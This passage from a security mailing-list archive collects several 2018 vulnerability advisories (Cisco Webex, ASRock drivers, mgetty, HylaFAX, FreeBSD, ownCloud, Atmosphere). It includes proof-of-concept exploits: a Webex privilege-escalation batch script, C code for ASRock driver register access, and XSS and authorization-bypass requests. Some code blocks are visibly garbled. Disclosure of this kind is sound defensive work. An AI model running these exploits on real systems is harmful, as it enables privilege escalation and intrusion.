from SecureAuth Exploits' Writers Team. The publication of this advisory
was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

*7. *Technical Description / Proof of Concept Code**

*7.1. *Privilege Escalation**

[CVE-2018-15442]
The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate user-supplied parameters. An unprivileged local
attacker could exploit this vulnerability by invoking the update service
command with a crafted argument. This will allow the attacker to run
arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying to an a local attacker
controller folder, the ptUpdate.exe binary. Also, a malicious dll must
be placed in the same folder, named wbxtrace.dll. To gain privileges,
the attacker must start the service with the command line: sc start
webexservice install software-update 1 "attacker-controlled-path"
(if the parameter 1 doesn't work, then 2 should be used)

Proof of Concept:

/-
REM Contents of PoC.bat
REM This batch will copy the ptUpdate.exe from the installation folder to the
current folder
REM Then it will generate a simple dll that will execute notepad.exe on load.
The dll will be created using certutil.exe and named wbxtrace.dll
REM Finally, the webexservice service will be started, with the showed
parameters
REM The result should be a notepad.exe with SYSTEM user privileges
@echo off
:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:END
echo
TVqQAAME//8AALgAQAAAsA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAABQRQAATAEEALCa5
> dll.txt
echo
VsAAOAADiELAQUMAAIGABAQIAAAEAAQAgAABAQEAABQBAAA3GEAAAIAABAAABAAEAAAEBBgIAAANQggAAAoAEwAAA
>> dll.txt
echo
AAIAAACC50ZXh0nQAQAgQAACAAAGAucmRhdGEAAJUAIAIGAABAAABALmRhdGEQADACCAAAQAAAwC5yZWxvYwAAGAB
>> dll.txt
echo
AAgoAAEAAAEIA
>> dll.txt
echo
A
>> dll.txt
echo
FWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA

[CORE-2018-0005] - ASRock Drivers Elevation of Privilege Vulnerabilities

2018-10-29 Thread SecureAuth Advisories Team

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

ASRock Drivers Elevation of Privilege Vulnerabilities

1. *Advisory Information*

Title: ASRock Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0005
Advisory URL:
https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
Date published: 2018-10-25
Date of last update: 2018-10-25
Vendors contacted: ASRock
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712

3. *Vulnerability Description*

ASRock's website states that [1]:

ASRock Inc. is established in 2002, specialized in the field of
motherboards. With the 3C design concept, Creativity, Consideration,
Cost-effectiveness, the company explores the limit of motherboards
manufacturing while paying attention on the eco issue at the same
time, developing products with the consideration of eco-friendly
concept. ASRock has been growing fast and become world third largest
motherboard brand with headquarter in Taipei, Taiwan and branches in
Europe and the USA.

ASRock offers several utilities designed to give the user with an ASRock
motherboard more control over certain settings and functions.
These utilities include various features like the RGB LED control,
hardware monitor, fan controls, and overclocking/voltage options.

Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
low level drivers, installed by ASRock RGBLED and other ASRock branded
utilities, which could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

   . ASRock RGBLED before v1.0.35.1
   . A-Tuning before v3.0.210
   . F-Stream before v3.0.210
   . RestartToUEFI before v1.0.6.2

5. *Vendor Information, Solutions and Workarounds*

ASRock published the following fixed applications for each of its
motherboards models:
   
   . ASRock RGBLED v1.0.36
   . A-Tuning v3.0.216
   . F-Stream v3.0.216
   . RestartToUEFI v1.0.7

Downloads are available on the ASRock website.

6. *Credits*

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo
from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
use a low level driver to program and query the status on embedded ICs
on their hardware. Fan curves, clock frequencies, LED colors, thermal
performance, and other user customizable properties and monitoring
functionality are exposed to applications through this low level kernel
driver.

The main subjects of this advisory are the device drivers
installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys).
>From now on addressed as "AsrDrv". Default installation allows
non-privileged user processes (even running at LOW INTEGRITY) to get a
HANDLE and issue IOCTL codes to the driver.

The following sections describe the problems found.

7.1. *CR register access*

[CVE-2018-10709]

AsrDrv exposes functionality to read and write CR register values. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.
 
/-
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers

#include 
#include 

#define IOCTL_ASROCK_READCR 0x22286C
#define IOCTL_ASROCK_WRITECR 0x222870

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _ASROCK_CR_STRUCT {
    ULONG64 reg;
    ULONG64 value;
} ASROCK_CR_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 };    \
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID),
##size##, (LPVOID)outbuffer, sizeof(outbuffer), , NULL);    \
    return outbuffer[1];    \

ULONG64 ASROCK_ReadCR(DWORD reg)
{
    ASROCK_CR_STRUCT  inbuffer = { 3, 0};
    IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
}

ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
{
    ASROCK_CR_STRUCT  inbuffer = { reg, value};
    IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
}

BOOL InitDriver()
{
    char szDeviceName[] = ".\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
    printf("Cannot get handle to driver object \'%s\'-
GetLastError:%d\n", szDeviceName, GetLastError());
    return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");

    if (!InitDriver()) {

X41 D-Sec GmbH Security Advisory X41-2018-007: Multiple Vulnerabilities in mgetty

2018-09-19 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-007

Multiple Vulnerabilities in mgetty
==


Overview
- 
Confirmed Affected Versions: 1.2.0
Patched Versions: 1.2.1
Vendor: mgetty
Vendor URL: http://mgetty.greenie.net
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty


Summary and Impact
- --
Multiple issues have been identified in the mgetty fax software. These
might be used by local users to elevate their privileges.
X41 did not perform a full test or audit on the software.


Product Description
- ---
- From the vendor: For those of you that do not know mgetty+sendfax yet:
it's a reliable and proven fax send and receive solution for unix and
Linux. But it can do much more... so read the docs and be surprised.

Shell injection via faxq-helper
===
Severity Rating: Medium
Vector: Fax Job
CVE: CVE-2018-16741
CWE: 78
CVSS Score: 6.1
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
In fax/faxq-helper.c function do_activate(), not all characters are
properly sanitized to prevent command injection. It is possible to use
||, && or > to change the control flow.

{% highlight c %}
/* replace all quote characters, backslash and ';' by '' */
for( q = buf; *q != '\0'; q++ )
{
if ( *q == '\'' || *q == '"' || *q == '`' ||
 *q == '\' || *q == ';' )
{ *q = ''; }
}
{% endhighlight %}

A job file containing malicious input can be constructed using
faxq-helper activate . One faxrunq is started, the code is
executed as the user running the command.

{% highlight bash %}
/* replace all quote characters, backslash and ';' by '' */
#   "   '\$   ;
command=tr -d '\042\047\140\134\044\073'  (pwd ? 0 : 1))
badlogin(tbuf);
failures = 0;
}
(void)strcpy(tbuf, username);
{% endhighlight %}


Stack Based Buffer Overflow With Long Argument in contrib/scrts.c
=
Severity Rating: Low
Vector: Command Line Parameter
CVE: CVE-2018-16742
CWE: 121
CVSS Score: 2.9
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
In file contrib/scrts.c a stack buffer overflow can be triggered via
command line parameter.

{% highlight c %}
int main( int argc, char ** argv )
{
int i, fd;
struct termios tio;
char device[1000];

for ( i=1; i/dev/null 2>&1", MAILER, mailto );
pipefp = popen( buf, "w" );
{% endhighlight %}


Endless loop in g3/g32pbm.c
===
When converting g32 files using g3/g32pbm.c, an endless loop can be
triggered by malformed input file. Example can be found at
files/g32pmbinfiniteloop.

Out Of Bounds Access in g3/pbm2g3.c
===
When converting pbm files using g3/pbm2g3.c, out of bounds accesses
can occur with malformed input files in putwhitespan(). An example can
be found with files/pbm2g2oobaccess.

{% highlight c %}
 putcode( twhite[l].bitcode, twhite[l].bitlength );
{% endhighlight %}


Workaround
- --
None.


Timeline
- 
2018-06-07 Issues found
2018-08-27 Issue reported to vendor
2018-08-28 Vendor reply
2018-09-08 Vendors sends patches
2018-09-08 CVE IDs requested
2018-09-09 CVE IDs assigned
2018-09-11 Patched Version released
2018-09-11 Advisory released

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and a IT security consulting and support services are
core competencies of X41.

- -- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier


-BEGIN PGP SIGNATURE-

iQJLBAEBCAA1FiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlui40AXHGFkdmlzb3Jp
ZXNAeDQxLWRzZWMuZGUACgkQo5Klpg50CxDAKg/6AmXcOmQnCDVgORX9xbmLvCXc
EcfNX7MNKlvegdm4D0TWb9WZKbWC0ubv1vSMB35qtYKMtdIwh/lYReb01/+WmRwV
alZTSnoPZmy3Wt0e1mzkSEjJqauawbVAZfi9bfgUmX1faWDkntkoOhfJVcGy2Tia
g0eiang5lg1v4m5yjiE4EHyzBKy+DqEYf6VNCje7cIQG/tFhuvatmd1HulZpFgK5
D/VBRCctKXaLNuoe5cIRmRD2tJZ4O7NmhudBVxJSrShTtv4cO0M6xPD0ddzhSHtn
JnuNdqYY0+sdVO+uf9kOF8qHG6iW1fLKiQAuyYZCTCZELDOUzby1x0IN2XwNxiX4
b2sl1vp/XoPvlIloZehTOtaYZimUjoSo65nMZb5Dlnc5zjkWHitD8CSSnuTJbuUQ
NL9b4IYJjGqjuTl9UAbdi4dXLUEgiXe4gTr399LqFKyRwYj1CJ5LKR+C6F1YW6FG
y8BoT4JGUd269HcQMUhO2

X41 D-Sec GmbH Security Advisory X41-2018-008: Multiple Vulnerabilities in HylaFAX

2018-09-19 Thread X41 D-Sec GmbH Advisories

X41 D-SEC GmbH Security Advisory: X41-2018-008

Multiple Vulnerabilities in HylaFAX
===


Overview

Confirmed Affected Versions: HylaFAX 6.0.6, HylaFAX+ 5.6.0
Confirmed Patched Versions: HylaFAX 6.0.7, HylaFAX+ 5.6.1
Vendor: Hylafax, Hylafax+
Vendor URL: https://www.hylafax.org/, http://hylafax.sourceforge.net/
Credit: X41 D-SEC GmbH, Luis Merino, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-008-Hylafax/


Summary and Impact
--
Severity Rating: Critical
Vector: Incoming fax call
CVE: CVE-2018-17141
CWE: 122, 457
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Multiple bugs were found in the code handling fax page reception in JPEG
format that allow arbitrary writes to an uninitialized pointer by remote
parties dialing in. When processing an specially crafted input, the issue
could lead to remote code execution.
Although JPEG reception is not announced as an available capability
by HylaFAX and is explicitly disabled during capabilities announcement,
there is code for JPEG support in HylaFAX that can be reached by a remote
party when setting certain flags during session negotiation.
X41 did not perform a full test or audit on the software.


Product Description
---
HylaFAX is an open-source system for sending and receiving faxes using
one or multiple fax modems.

Analysis

X41 discovered several vulnerabilities in HylaFAX that are exploitable
by local or remote attackers.


Uninitialized pointer write in FaxModem::writeECMData()
---
In CopyQuality.c++:990 recvRow is initialized only when params.jp is
exactly JP_GREY or JP_COLOR and also params.df is exactly zero.

{% highlight c %}
uint dataform = params.df + (params.jp ? params.jp + 4 : 0);
//...
switch (dataform) {
//...
case JPGREY+4:
case JPCOLOR+4:
recvEOLCount = 0;
recvRow = (uchar) malloc(10241000); // 1M should do it?
{% endhighlight %}
However, later in the same function recvRow is used as a target for
memcpy() when params.jp is JP_GREY or JP_COLOR, irrespective of
params.df.  Consequently, if a sender crafts a DCS signal that leads to
params.df being non-zero while params.jp is JP_GREY or JP_COLOR, then
recvRow will be uninitialized when it is used as a target for memcpy().
{% highlight c %}
if (params.jp != JPGREY && params.jp != JPCOLOR) {
flushRawData(tif, 0, (const u_char) buf, cc);
} else {
memcpy(recvRow, (const char) buf, cc);
recvRow += cc;
}
{% endhighlight %}


Out of bounds write in FaxModem::writeECMData()
---
The same piece of code for memcpy at CopyQuality.c++:1045 can be
abused to perform an out of bounds write to recvRow, as there is no
bounds check before writing to and incrementing recvRow. This can
lead to remote code execution when an attacker sends an specially
crafted input.


Out of bounds write in FaxModem::recvPageDLEData()
--
CopyQuality:c++:446 presents another unbounded memcpy that can be
abused to perform an out of bounds write to recvRow.

{% highlight c %}
if (n >= RCVBUFSIZ)
flushRawData(tif, 0, (const u_char) raw, n);
else {
memcpy(recvRow, (const char) raw, n);
recvRow += n;
}
{% endhighlight %}

The code doesn't seem to be reachable, as JPEG flag forces ECM
reception.


Workaround
--
None.

Timeline

2018-06-07 Issues found
2018-08-24 Issue reported to vendor
2018-09-02 Vendor sends patches
2018-09-17 CVE ID assigned
2018-09-18 Patches released
2018-09-19 Advisory released

External links
==
See https://www.x41-dsec.de/lab/blog/fax/ for a blog post related to this
advisory.

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and a IT security consulting and support services are
core competencies of X41.

- -- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier

FreeBSD Security Advisory FreeBSD-SA-18:12.elf

2018-09-12 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:12.elfSecurity Advisory
  The FreeBSD Project

Topic:  Improper ELF header parsing

Category:   core
Module: kernel
Announced:  2018-09-12
Credits:Thomas Barabosch, Fraunhofer FKIE; Mark Johnston
Affects:All supported versions of FreeBSD.
Corrected:  2018-09-12 05:02:11 UTC (stable/11, 11.1-STABLE)
2018-09-12 05:07:35 UTC (releng/11.2, 11.2-RELEASE-p3)
2018-09-12 05:07:35 UTC (releng/11.1, 11.1-RELEASE-p14)
2018-09-12 05:03:30 UTC (stable/10, 10.4-STABLE)
2018-09-12 05:07:35 UTC (releng/10.4, 10.4-RELEASE-p12)
CVE Name:   CVE-2018-6924

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

To execute a binary the kernel must parse the ELF header to determine the
entry point address, the program interpreter, and other parameters.

II.  Problem Description

Insufficient validation was performed in the ELF header parser, and malformed
or otherwise invalid ELF binaries were not rejected as they should be.

III. Impact

Execution of a malicious ELF binary may result in a kernel crash or may
disclose kernel memory.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date, and
reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch
# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch.asc
# gpg --verify elf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/10/r338605
releng/10.4/  r338606
stable/11/r338604
releng/11.1/  r338606
releng/11.2/  r338606
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6924>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-18:12.elf.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAluYoK9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKA+BAApeUtPHpy5mEHC8ftJ+3NZpfI8gcfuPE0dlJi6CpXq8/ruXN5Yt5X0E0l
hlbNGqEMckfe3F81rCXLbtu0zeAnSBfAFcm9xSBa6aSRfP4GAZtKDKwilPqqT9F8
sOrPR/mAfxWmWcfDt8ggAx6akr2Tt48t7TiBP/kA14+CzVmp/pMU/ceFDLk8JYjY
PQzVM4fHC5xeBWtA2JjMNHnhR6XMeiDOLkgeRiRW1LhB/OwWwcb0uzVixxR34mCT
vFm1eJteAitoVclgnI//GkzZZ6b7SZkqyqODWKVLWXaYgb8/Z6SaKAQm2TWuHPEh
nzIpPGhnXZc+36Nn9/HYDKVn3skD1sYAnTMgPcUYZH3KfkohvFdHlnoGqkcnMwTy
mSKkQx9ojuLfwot7tyJCbgU/6e82ed1g9EiFZXwW8x4ePClaAvrDozz0QGwlXgyY
1jBbFp/gYznhxTetVRHo5ug5SHZgD2Ye46TCoglHX0CprhkWwpKenoCEyfyjlHXH
uI+RPd46TlQfuK4bqURRpWvNWprXGqQ0ypFVW2JJgqLPBX0QS79gzqO++C8tRqQv
e16mqzBGNIre/8FOCBpV/Z61NgxqeYo2ndHxc9VTMiFXK/2v3TDK9AvYZ1/xEvwC
IRpC+qo870B5XT/ihC/KpYI4jgM2/pK/Mdez6Q4s5M6eeCBHAgw=
=J/a5
-END PGP SIGNATURE-

CSNC-2018-015 - ownCloud Impersonate - Authorization Bypass

2018-08-30 Thread Advisories

#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  ownCloud Impersonate
# Vendor:   ownCloud
# CSNC ID:  CSNC-2018-015
# CVE ID:   N/A
# Subject:  Authorization bypass
# Risk: High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz 
# Date: 29.08.2018
#
#


Introduction:
-
ownCloud [1] is a suite of client-server software for creating file hosting 
services and using them. An app called Impersonate [2] was created to allow 
administrators to impersonate other users.

According to the documentation [3], group admins should only be able to access 
users of the groups they are administrator of.

Compass Security discovered that it was possible for a group admin to 
impersonate any user, except global administrators.

This way, group admins have access to data of users of other groups, even 
though they shouldn't.


Affected:
-
Vulnerable:
 * Version 0.1.2

Not vulnerable:
 * Version 0.2.0

No other version was tested, but it is believed for the older versions to be 
vulnerable too.


Technical Description
-
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
 * group1
 * group2

Create four users as follows:
 * test1; group = group1; group admin = group1
 * test2; group = group1; group admin = no group
 * test3; group = group2; group admin = group2
 * test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group admins 
to impersonate users from these groups" and add the two groups "group1" and 
"group2".

Log in with "test1", open the user page and impersonate the user "test2". 
There, intercept the POST request to /apps/impersonate/user and replace 
"target=test2" by "target=test3" in the body as shown below.

As a result, the user "test1" will impersonate the user "test3", even though 
"test1" is only group admin of "group1" and "test3" is not in this group.

Request:
=
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
=

Response:
=
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 
'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: 
blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=


Workaround / Fix:
-
Check the authorization consistently to prevent group admins to be able to 
impersonate users from other groups.


Timeline:
-
2018-08-29: Coordinated public disclosure date
2018-04-17: Release of fixed version 0.2.0
2018-03-16: Initial vendor response
2018-03-16: Initial vendor notification
2018-03-15: Discovery by Thierry Viaccoz


References:
---
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] 
https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html

CSNC-2018-016 - ownCloud iOS Application - Cross-Site Scripting

2018-08-15 Thread Advisories

#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  ownCloud iOS Application (owncloud.iosapp) [1]
# Vendor:   ownCloud Gmbh
# CSNC ID:  CSNC-2018-016
# CVE ID:   N/A
# Subject:  Cross-Site Scripting in ownCloud iOS Application's WebViews
# Risk: Low
# Effect:   Remotely exploitable
# Author:   Sylvain Heiniger 
# Date: 14.08.2018
#
#

Introduction:
-
HTML pages will be rendered in a WebView in the ownCloud iOS application.
JavaScript will be executed in this WebView when previewing an HTML file.

The webview is run in a sandbox, so no other data can be read a priori. 
However, in case the WebView iself were to have a vulnerability, an attacker 
could access other data of the application. The HTML rendering could also be 
misused for phishing.

Affected:
-
Vulnerable:
 * ownCloud Version 3.7.3 for iOS

Not vulnerable:
 * ownCloud Android Application
 * ownCloud Server
 * ownCloud Version 3.7.5 for iOS


Technical Description
-
Send an html file to an ownCloud instance, open it in the iOS application, HTML 
gets interpreted.

$  cat test.html

https://hes.xss.ht&quot</a>;>
alert("this JavaScript is interpreted!");

$dave -u admin -p [password] 
https://[your-instance].owncloud-demo.com/remote.php/webdav/
dave> put test.html
  put https://7pswlqfpkn.owncloud-demo.com/remote.php/webdav/test.html (117 
bytes) (success)


Workaround / Fix:
-
Since iOS 8 one can use the WKWebView class instead of using UIWebView. Setting 
the WKPreferences property javaScriptEnabled to false will prevent JavaScript 
to be run.
This fixed has been implemented in release 3.7.5 [2].


Timeline:
-
2018-08-14: Advisory publication
2018-07-09: Fix verification
2018-06-19: Release with fix publication
2018-03-16: Initial acknowledgment of the vulnerability
2018-03-14: Contact via HackerOne
2018-03-13: Discovery by Sylvain Heiniger


References:
---
[1] https://github.com/owncloud/ios
[2] https://github.com/owncloud/ios/releases/tag/version_3.7.5

CSNC-2018-023 - Atmosphere Framework - Reflected Cross-Site Scripting (XSS)

2018-08-15 Thread Advisories

#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:   Atmosphere [1]
# Vendor:Async-IO.org
# CSNC ID:   CSNC-2018-023
# Subject:   Reflected Cross-Site Scripting (XSS)
# Risk:  High
# Effect:Remotely exploitable
# Author:Lukasz D. (advisor...@compass-security.com)
# Date:  13.08.2018
#
#

Introduction:
-
The Atmosphere Framework is the most popular asynchronous application
development framework for enterprise Java. The Atmosphere Framework provides
the enterprise features required to build massive scalable and real time
asynchronous applications using transports like WebSocket, Server Sent Events
and traditional Ajax Techniques. [2]

Web applications using the Atmosphere Framework were found to be vulnerable to a
common security flaw that allows an attacker to execute malicious code in the
browser of users that followed a manipulated link to access the application.
Exploiting the vulnerability allows the attacker, for instance, to redirect the
user to a phishing page or interact with the application on behalf of the user.

Affected:
-
The following Atmosphere versions are vulnerable:
- 2.4.0 - 2.4.28
- 2.3.0 - 2.3.9
- 2.2.0 - 2.2.12
- 2.1.0 - 2.1.13
- 2.0.0 - 2.0.11
- 1.0.0 - 1.0.20

Technical Description:
--
The JSONP transport method supported by the Atmosphere Framework is vulnerable
to a reflected Cross-Site Scripting (XSS) attack. The JSONP callback parameter
that will be put into the server's response can contain HTML code. As the
response does not specify the content type, it may be treated as an HTML page by
browsers. For example, Firefox 52 ESR will execute JavaScript payload reflected
in the response in the following proof of concept:

Request:
GET /chat?X-Atmosphere-Transport=jsonp&
  jsonpTransport=%3Chtml%3E%3Cbody%20onload=alert(`XSS`)%3E&
  X-Atmosphere-tracking-id=1&
  X-Atmosphere-Framework=1&
  X-atmo-protocol=true HTTP/1.1
Host: [CUT]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Atmosphere-tracking-id: 1
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Date: Mon, 16 Jul 2018 13:37:00 GMT
Connection: close
Content-Length: 52

({"message" : "X"});

Workaround / Fix:
-
It needs to be ensured that all JSONP responses are delivered with the correct
HTTP header: "Content-Type: application/javascript; charset=utf-8". Moreover,
JSONP callback function should not contain any non-alphanumeric characters.

Timeline:
-
2018-07-16:   Vulnerability discovered
2018-07-18:   Initial vendor notification
2018-07-18:   Initial vendor response
2018-07-20:   Patched version released
2018-08-13:   Public disclosure

References:
---
[1]: https://github.com/Atmosphere
[2]: https://async-io.org/

FreeBSD Security Advisory FreeBSD-SA-18:11.hostapd

2018-08-15 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:11.hostapdSecurity Advisory
  The FreeBSD Project

Topic:  Unauthenticated EAPOL-Key Decryption Vulnerability

Category:   contrib
Module: wpa
Announced:  2018-08-14
Credits:Mathy Vanhoef of the imec-DistriNet research group of
KU Leuven
Affects:All supported versions of FreeBSD.
Corrected:  2018-08-15 05:03:54 UTC (stable/11, 11.1-STABLE)
2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
2018-08-15 05:05:02 UTC (stable/10, 10.4-STABLE)
2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:   CVE-2018-14526

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The wpa_supplicant(8) utility is a client (supplicant) with support for WPA
and WPA2 (IEEE 802.11i / RSN).  It is suitable for both desktop and laptop
computers as well as embedded systems.  Supplicant is the IEEE 802.1X/WPA
component that is used in the client stations.  It implements key negotiation
with a WPA Authenticator and it controls the roaming and IEEE 802.11
authentication/association of the wlan(4) driver.

The wpa_supplicant(8) utility is designed to be a "daemon" program that runs
in the background and acts as the backend component controlling the wireless
connection.  The wpa_supplicant(8) utility supports separate frontend programs
and a text-based frontend (wpa_cli(8)) and a GUI (wpa_gui) are included with
wpa_supplicant(8).

II.  Problem Description

When using WPA2, EAPOL-Key frames with the Encrypted flag and without the MIC
flag set, the data field was decrypted first without verifying the MIC.  When
the dta field was encrypted using RC4, for example, when negotiating TKIP as
a pairwise cipher, the unauthenticated but decrypted data was subsequently
processed.  This opened wpa_supplicant(8) to abuse by decryption and recovery
